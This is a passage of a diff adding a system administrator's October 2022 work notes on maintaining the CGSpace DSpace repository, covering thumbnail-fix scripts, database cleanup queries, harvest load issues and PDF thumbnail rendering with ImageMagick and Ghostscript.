+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
+</span></span><span style="display:flex;"><span>    at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
+</span></span><span style="display:flex;"><span>    at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
+</span></span><span style="display:flex;"><span>    at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
+</span></span><span style="display:flex;"><span>    at com.sun.proxy.$Proxy186.service(Unknown Source)
+</span></span><span style="display:flex;"><span>    at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
+</span></span><span style="display:flex;"><span>    at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1216)
+</span></span><span style="display:flex;"><span>    at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1001)
+</span></span><span style="display:flex;"><span>    at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:945)
+</span></span><span style="display:flex;"><span>    at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:867)
+</span></span><span style="display:flex;"><span>    at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:951)
+</span></span><span style="display:flex;"><span>    at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:853)
+</span></span><span style="display:flex;"><span>    at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
+</span></span><span style="display:flex;"><span>    at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:827)
+</span></span><span style="display:flex;"><span>    at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:113)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:160)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+</span></span><span style="display:flex;"><span>    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+</span></span><span style="display:flex;"><span>    at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:492)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:165)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:235)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+</span></span><span style="display:flex;"><span>    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
+</span></span><span style="display:flex;"><span>    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1201)
+</span></span><span style="display:flex;"><span>    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
+</span></span><span style="display:flex;"><span>    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
+</span></span><span style="display:flex;"><span>    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+</span></span><span style="display:flex;"><span>    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+</span></span><span style="display:flex;"><span>    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+</span></span><span style="display:flex;"><span>    at java.lang.Thread.run(Thread.java:750)
+</span></span></code></pre></div><ul>
+<li>So this is a broken side effect from the <code>org.apache.cocoon.uploads.autosave=false</code> change I made a few weeks ago
+<ul>
+<li>Importing the CSV via the command line works fine</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-04">2022-10-04</h2>
+<ul>
+<li>I stumbled across more low-quality thumbnails on CGSpace
+<ul>
+<li>Some have the description &ldquo;Generated Thumbnail&rdquo;, and others are manually uploaded &ldquo;.jpg.jpg&rdquo; ones&hellip;</li>
+<li>I want to develop some more thumbnail fixer scripts to the cgspace-java-helpers suite:
+<ul>
+<li>If an item has an <code>IM Thumbnail</code> and a <code>Generated Thumbnail</code> in the <code>THUMBNAIL</code> bundle, remove the <code>Generated Thumbnail</code></li>
+<li>If an item has a PDF bitstream and a JPG bitstream with description /thumbnail/ in the ORIGINAL bundle, remove the /thumbnail/ bitstream in the ORIGINAL bundle and try to remove the /thumbnail/.jpg bitstream in the THUMBNAIL bundle</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-05">2022-10-05</h2>
+<ul>
+<li>I updated the <a href="https://github.com/ilri/cgspace-java-helpers">cgspace-java-helpers</a> to include a new <code>FixLowQualityThumbnails</code> script to detect the low-quality thumbnails I found above</li>
+<li>Add missing ORCID identifier for an Alliance author</li>
+<li>I&rsquo;ve been running the <code>dspace cleanup -v</code> script every few weeks or months on CGSpace and assuming it finished successfully because I didn&rsquo;t get a error on the stdout/stderr, but today I noticed that the script keeps saying it is deleting the same bitstreams
+<ul>
+<li>I looked in dspace.log and found the error I used to see a lot:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Caused by: org.postgresql.util.PSQLException: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+</span></span><span style="display:flex;"><span>  Detail: Key (uuid)=(99b76ee4-15c6-458c-a940-866148bc7dee) is still referenced from table &#34;bundle&#34;.
+</span></span></code></pre></div><ul>
+<li>If I mark the primary bitstream as null manually the cleanup script continues until it finds a few more
+<ul>
+<li>I ended up with a long list of UUIDs to fix before the script would complete:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -d dspace -c <span style="color:#e6db74">&#34;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (&#39;b76d41c0-0a02-4f53-bfde-a840ccfff903&#39;,&#39;1981efaa-eadb-46cd-9d7b-12d7a8cff4c4&#39;,&#39;97a8b1fa-3c12-4122-9c7b-fc2a3eaf570d&#39;,&#39;99b76ee4-15c6-458c-a940-866148bc7dee&#39;,&#39;f330fc22-a787-46e2-b8d0-64cc3e166124&#39;,&#39;592f4a0d-1ed5-4663-be0e-958c0d3e653b&#39;,&#39;e73b3178-8f29-42bc-bfd1-1a454903343c&#39;,&#39;e3a5f592-ac23-4934-a2b2-26735fac0c4f&#39;,&#39;73f4ff6c-6679-44e8-8cbd-9f28a1df6927&#39;,&#39;11c9a75c-17a6-4966-a4e8-a473010eb34c&#39;,&#39;155faf93-92c5-4c17-866e-1db50b1f9687&#39;,&#39;8e073e9e-ab54-4d99-971a-66de073d51e3&#39;,&#39;76ddd62c-6499-4a8c-beea-3fc8c60200d8&#39;,&#39;2850fcc9-f450-430a-9317-c42def74e813&#39;,&#39;8fef3198-2aea-4bd8-aeab-bf5fccb46e42&#39;,&#39;9e3c3528-e20f-4da3-a0bd-ae9b8515b770&#39;)&#34;</span>
+</span></span></code></pre></div><h2 id="2022-10-06">2022-10-06</h2>
+<ul>
+<li>I finished running the cleanup script on CGSpace and the before and after on the number of bitstreams is interesting:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ find /home/cgspace.cgiar.org/assetstore -type f | wc -l
+</span></span><span style="display:flex;"><span>181094
+</span></span><span style="display:flex;"><span>$ find /home/cgspace.cgiar.org/assetstore -type f | wc -l
+</span></span><span style="display:flex;"><span>178329
+</span></span></code></pre></div><ul>
+<li>So that cleaned up ~2,700 bitstreams!</li>
+<li>Interesting, someone on the DSpace Slack mentioned this as being a known issue with discussion, reproducers, and a pull request: <a href="https://github.com/DSpace/DSpace/issues/7348">https://github.com/DSpace/DSpace/issues/7348</a></li>
+<li>I am having an issue with the new FixLowQualityThumbnails script on some communities like 10568/117865 and 10568/97114
+<ul>
+<li>For some reason it doesn&rsquo;t descend into the collections</li>
+<li>Also, my old FixJpgJpgThumbnails doesn&rsquo;t either&hellip; weird</li>
+<li>I might have to resort to getting a list of collections and doing it that way:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -h localhost -U postgres -d dspacetest -c <span style="color:#e6db74">&#39;SELECT ds6_collection2collectionhandle(uuid) FROM collection WHERE uuid in (SELECT uuid FROM collection);&#39;</span> |
+</span></span><span style="display:flex;"><span>    sed 1,2d |
+</span></span><span style="display:flex;"><span>    tac |
+</span></span><span style="display:flex;"><span>    sed 1,3d &gt; /tmp/collections
+</span></span></code></pre></div><ul>
+<li>Strange, I don&rsquo;t think doing it by collections is actually working because it says it&rsquo;s replacing the bitstreams, but it doesn&rsquo;t actually do it
+<ul>
+<li>I don&rsquo;t have time to figure out what&rsquo;s happening, because I see &ldquo;update_item&rdquo; in dspace.log when the script says it&rsquo;s doing it, but it doesn&rsquo;t do it</li>
+<li>I might just extract a list of items that have .jpg.jpg thumbnails from the database and run the script through item mode</li>
+<li>There might be a problem with the context commit logic&hellip;?</li>
+</ul>
+</li>
+<li>I exported a list of items that have .jpg.jpg thumbnails on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres -d dspacetest -c <span style="color:#e6db74">&#34;SELECT ds6_bitstream2itemhandle(dspace_object_id) FROM metadatavalue WHERE text_value ~ &#39;.*\.(jpg|jpeg|JPG|JPEG)\.(jpg|jpeg|JPG|JPEG)&#39; AND dspace_object_id IS NOT NULL;&#34;</span> |
+</span></span><span style="display:flex;"><span>  sed 1,2d |
+</span></span><span style="display:flex;"><span>  tac |
+</span></span><span style="display:flex;"><span>  sed 1,3d |
+</span></span><span style="display:flex;"><span>  grep -v &#39;␀&#39; |
+</span></span><span style="display:flex;"><span>  sort -u |
+</span></span><span style="display:flex;"><span>  sed &#39;s/ //&#39; &gt; /tmp/jpgjpg-handles.txt
+</span></span></code></pre></div><ul>
+<li>I restarted DSpace Test because it had high load since yesterday and I don&rsquo;t know why</li>
+<li>Run <code>check-duplicates.py</code> on the 1642 MARLO Innovations to try to include matches from the OICRs we uploaded last month
+<ul>
+<li>Then I processed those matches like I did with the OICRs themselves last month, and then cleaned them one last time with csv-metadata-quality, created a SAF bundle, and uploaded them to CGSpace</li>
+<li>BTW this bumps CGSpace over 100,000 items&hellip;</li>
+<li>Then I did the same for the 749 MARLO MELIAs and imported them to CGSpace</li>
+</ul>
+</li>
+<li>Meeting about CG Core types with Abenet, Marie-Angelique, Sara, Margarita, and Valentina</li>
+<li>I made some minor logic changes to the FixJpgJpgThumbnails script in cgspace-java-helpers
+<ul>
+<li>Now it checks to make sure the bitstream description is not empty or null, and also excludes Maps (in addition to Infographics) since those are likely to be JPEG files in the ORIGINAL bundle on purpose</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-07">2022-10-07</h2>
+<ul>
+<li>I did the matching and cleaning on the 512 MARLO Policies and uploaded them to CGSpace</li>
+<li>I sent a list of the IDs and Handles for all four groups of MARLO items to Jose so he can do the redirects on their server:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wc -l /tmp/*mappings.csv
+</span></span><span style="display:flex;"><span>  1643 /tmp/crp-innovation-mappings.csv
+</span></span><span style="display:flex;"><span>   750 /tmp/crp-melia-mappings.csv
+</span></span><span style="display:flex;"><span>   683 /tmp/crp-oicr-mappings.csv
+</span></span><span style="display:flex;"><span>   513 /tmp/crp-policy-mappings.csv
+</span></span><span style="display:flex;"><span>  3589 total
+</span></span></code></pre></div><ul>
+<li>I fixed the mysterious issue with my cgspace-java-helpers scripts not working on communities and collections
+<ul>
+<li>It was because the code wasn&rsquo;t committing the context!</li>
+<li>I ran both <code>FixJpgJpgThumbnails</code> and <code>FixLowQualityThumbnails</code> on a dozen or so large collections on CGSpace and processed about 1,200 low-quality thumbnails</li>
+</ul>
+</li>
+<li>I did a complete re-sync of CGSpace to DSpace Test</li>
+</ul>
+<h2 id="2022-10-08">2022-10-08</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+<li>Experiment with PDF thumbnails in ImageMagick again, I found an <a href="https://legacy.imagemagick.org/Usage/thumbnails/">interesting reference on their legacy website</a> saying we can use <code>-unsharp</code> after <code>-thumbnail</code> to make them less blurry
+<ul>
+<li>There are a few examples for unsharp values (starting from a DSpace default of a flattened JPEG from the PDF, then the thumbnail in a second operation:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ convert <span style="color:#e6db74">&#39;10568-103447.pdf[0]&#39;</span> -flatten 10568-103447-dspace-step1.pdf.jpg 
+</span></span><span style="display:flex;"><span>$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 0x.5 10568-103447-dspace-step2-600-unsharp.pdf.jpg
+</span></span><span style="display:flex;"><span>$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 2x0.5+0.7+0 10568-103447-dspace-step2-600-unsharp2.pdf.jpg
+</span></span><span style="display:flex;"><span>$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 0x0.75+0.75+0.008 10568-103447-dspace-step2-600-unsharp3.pdf.jpg
+</span></span><span style="display:flex;"><span>$ convert 10568-103447-dspace-step1.pdf.jpg -thumbnail 600x600 -unsharp 1.5x1+0.7+0.02 10568-103447-dspace-step2-600-unsharp4.pdf.jpg
+</span></span></code></pre></div><ul>
+<li>I merged all the changes from <code>6_x-dev</code> to <code>6_x-prod</code> after having run them on DSpace Test for the last ten days</li>
+</ul>
+<h2 id="2022-10-11">2022-10-11</h2>
+<ul>
+<li>I put together the microsite for improving DSpace PDF thumbnails: <a href="https://github.com/alanorth/improved-dspace-thumbnails/">https://github.com/alanorth/improved-dspace-thumbnails/</a>
+<ul>
+<li>I need to make the pull request to DSpace</li>
+</ul>
+</li>
+<li>I also discussed the thumbnails with Dani in Addis</li>
+</ul>
+<h2 id="2022-10-12">2022-10-12</h2>
+<ul>
+<li>I submitted a pull request to DSpace 7 for the <code>-unsharp 0x0.5</code> change: <a href="https://github.com/DSpace/DSpace/pull/8515">https://github.com/DSpace/DSpace/pull/8515</a></li>
+<li>I did some tests on CGSpace and verified that MEL will indeed need admin permissions on every collection that they want to map to</li>
+<li>I had a call with Salem and he asked me about redirecting from some CRP duplicates that exist in both MELSpace and CGSpace
+<ul>
+<li>We decided that the only way is to use an HTTP 301 redirect in the nginx web server, but I said that I&rsquo;d check with CNRI to see if there was a way to do this within the Handle system</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-13">2022-10-13</h2>
+<ul>
+<li>Disable the REST API cache on CGSpace temporarily to see if that fixes a strange problem we are seeing with listing publications on ilri.org</li>
+<li>Meeting with MEL, MARLO, and CG Core people to continue discussing <code>dcterms.type</code></li>
+<li>I added the new MEL account to all the appropriate authorizations for Initiatives that ICARDA is involved in on CGSpace
+<ul>
+<li>I still have to add the few that WorldFish is involved in</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-14">2022-10-14</h2>
+<ul>
+<li>Abenet finalized adding the MEL user to all initiative collections on CGSpace</li>
+<li>Re-sync CGSpace to DSpace Test to get the new MEL user and authorizations</li>
+<li>I checked ilri.org and I see more publications for 2021 and earlier
+<ul>
+<li>The results are still strange though because I only see a few for each year</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-15">2022-10-15</h2>
+<ul>
+<li>I&rsquo;m going to turn the REST API cache on CGSpace back on to see if the ilri.org publications thing gets broken again</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-10-16">2022-10-16</h2>
+<ul>
+<li>The harvest on AReS finished but somehow there are 10,000 less items than the previous indexing&hellip; hmmm
+<ul>
+<li>I don&rsquo;t see any hits from MELSpace there so I will start another harvest&hellip;</li>
+<li>After starting the harvesting the load on the server went up to 20 and UptimeRobot said CGSpace was down for three hours, sigh</li>
+<li>I stopped the harvesting and the load went down immediately</li>
+<li>I am trying to find a pattern with the load on Sundays</li>
+</ul>
+</li>
+<li>I see this in the AReS backend logs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[Nest] 1   - 10/16/2022, 6:42:04 PM   [HarvesterService] Starting Harvest =&gt;0
+</span></span><span style="display:flex;"><span>[Nest] 1   - 10/16/2022, 6:42:07 PM   [HarvesterService] Starting Harvest =&gt;101555
+</span></span><span style="display:flex;"><span>[Nest] 1   - 10/16/2022, 6:42:10 PM   [HarvesterService] Starting Harvest =&gt;4936
+</span></span></code></pre></div><ul>
+<li>Which means MELSpace is having some issue</li>
+<li>I&rsquo;m not sure what was going on on CGSpace yesterday, but the load was indeed very high according to Munin:</li>
+</ul>
+<p><img src="/cgspace-notes/2022/10/cpu-day.png" alt="CGSpace CPU load day"></p>
+<ul>
+<li>The pattern is clear on Sundays if you look at the past month:</li>
+</ul>
+<p><img src="/cgspace-notes/2022/10/cpu-month.png" alt="CGSpace CPU load month"></p>
+<ul>
+<li>I have yet to find an increased nginx request pattern correlating with the increased load, but looking back on the last year it seems something started happening around March, 2022, and also I start seeing CPU steal in July (red coming from the top of the graph):</li>
+</ul>
+<p><img src="/cgspace-notes/2022/10/cpu-year.png" alt="CGSpace CPU load year"></p>
+<ul>
+<li>The amount of CPU steal is very low if I look at it now, around 1 or 2 percent, but what&rsquo;s happening now reminds me of the mysterious load problems I had in 2019-03 that were due to CPU steal</li>
+<li>Salem said there was an issue with the sitemaps on MELSpace so that&rsquo;s why it wasn&rsquo;t working in AReS
+<ul>
+<li>Load on CGSpace is low in the evening so I&rsquo;ll start a new AReS harvest</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-18">2022-10-18</h2>
+<ul>
+<li>Start mapping the Initiative names on CGSpace to tne new short names from Enrico&rsquo;s spreadsheet</li>
+<li>Then I will update them for existing CGSpace items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2022-10-18-update-initiatives.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.initiative -m <span style="color:#ae81ff">258</span> -t correct -d -n
+</span></span></code></pre></div><ul>
+<li>And later in the controlled vocabulary</li>
+<li>Apply some corrections to a few hundred items on CGSpace for Peter</li>
+<li>Meeting with Abenet, Sara, and Valentina about CG Core types
+<ul>
+<li>We finished going over our list and agreed to send a message to concerned parties in our organizations for feedback by November 4th</li>
+<li>Next week we will continue doing the definitions</li>
+</ul>
+</li>
+<li>Re-sync CGSpace to DSpace Test to get the latest Initiatives changes
+<ul>
+<li>I also need to re-create the CIAT/Alliance TIP accounts so they can continue testing</li>
+<li>I re-created the <a href="mailto:tip-submit@cgiar.org">tip-submit@cgiar.org</a> and <a href="mailto:tip-approve@cgiar.org">tip-approve@cgiar.org</a> account on DSpace Test</li>
+<li>According to my notes:
+<ul>
+<li>A user must be in the collection admin group in order to deposit via the REST API (not in the collection&rsquo;s &ldquo;Submit&rdquo; group, which is for normal submission)</li>
+<li>A user must be in the collection&rsquo;s &ldquo;Accept/Reject/Edit Metadata&rdquo; step in order to see and approve the item in the DSpace workflow</li>
+</ul>
+</li>
+<li>I created a new &ldquo;TIP test&rdquo; collection under Alliance&rsquo;s community and added the users accordingly</li>
+<li>I think I&rsquo;ll be able to just add these two submit/approve users to the Alliance Admins and Alliance Editors groups once we&rsquo;re ready</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-19">2022-10-19</h2>
+<ul>
+<li>I submitted a <a href="https://bugs.ghostscript.com/show_bug.cgi?id=705994">bug report for the two-page portrait layout of some PDF thumbnails</a> on Ghostscript&rsquo;s bug tracker
+<ul>
+<li>For reference, the thumbnail for PDFs like in <a href="https://hdl.handle.net/10568/116598">10568/116598</a> looks like this:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2022/10/gs-10568-116598.pdf.jpg" alt="gs thumbnail"></p>
+<ul>
+<li>In other news, I see <code>pdftocairo</code> from the poppler package produces a similar, though slightly prettier version of the thumbnail of that PDF:</li>
+</ul>
+<p><img src="'/cgspace-notes/2022/10/pdftocairo-10568-116598.pdf.jpg" alt="pdftocairo thumbnail"></p>
+<ul>
+<li>I used the command:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ pdftocairo -jpeg -singlefile -f <span style="color:#ae81ff">1</span> -l <span style="color:#ae81ff">1</span> -scale-to-x <span style="color:#ae81ff">640</span> -scale-to-y -1 10568-116598.pdf thumb
+</span></span></code></pre></div><ul>
+<li>The Ghostscript developers responded in a few minutes (!) and explained that PDFs can contain many different &ldquo;boxes&rdquo;:</li>
+</ul>
+<blockquote>
+<p>PDF files can have multiple different &lsquo;Box&rsquo; values; ArtBox, BleedBox, CropBox,  MediaBox and TrimBox. The MediaBox is required the other boxes are optional, a given PDF page description must contain the MediaBox and may contain any or all of the others.</p>
+<p>By default Ghostscript uses the MediaBox to determine the size of the media. Other PDF consumers may exhibit other behaviours.</p>
+<p>The pages in your PDF file contain all of the Boxes. In the majority of cases the Boxes all contain the same values (which makes their inclusion pointless of course). But for page 1 they differ:</p>
+<p>/CropBox[594.375 0.0 1190.55 839.176]
+/MediaBox[0.0 0.0 1190.55 841.89]</p>
+<p>You can tell Ghostscript to use a different Box value for the media by using one of -dUseArtBox, -dUseBleedBox, -dUseCropBox, -dUseTrim,Box. If I specify -dUseCropBox then the file is rendered as you expect.</p>
+</blockquote>
+<ul>
+<li>I confirm that adding <code>-define pdf:use-cropbox=true</code> to the ImageMagick command produces a better thumbnail in this case
+<ul>
+<li>We can check the boxes in a PDF using <code>pdfinfo</code> from the poppler package:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ pdfinfo -box data/10568-116598.pdf
+</span></span><span style="display:flex;"><span>Creator:         Adobe InDesign 17.0 (Macintosh)
+</span></span><span style="display:flex;"><span>Producer:        Adobe PDF Library 16.0.3
+</span></span><span style="display:flex;"><span>CreationDate:    Tue Dec  7 12:44:46 2021 EAT
+</span></span><span style="display:flex;"><span>ModDate:         Tue Dec  7 15:37:58 2021 EAT
+</span></span><span style="display:flex;"><span>Custom Metadata: no
+</span></span><span style="display:flex;"><span>Metadata Stream: yes
+</span></span><span style="display:flex;"><span>Tagged:          no
+</span></span><span style="display:flex;"><span>UserProperties:  no
+</span></span><span style="display:flex;"><span>Suspects:        no
+</span></span><span style="display:flex;"><span>Form:            none
+</span></span><span style="display:flex;"><span>JavaScript:      no
+</span></span><span style="display:flex;"><span>Pages:           17
+</span></span><span style="display:flex;"><span>Encrypted:       no
+</span></span><span style="display:flex;"><span>Page size:       596.175 x 839.176 pts
+</span></span><span style="display:flex;"><span>Page rot:        0
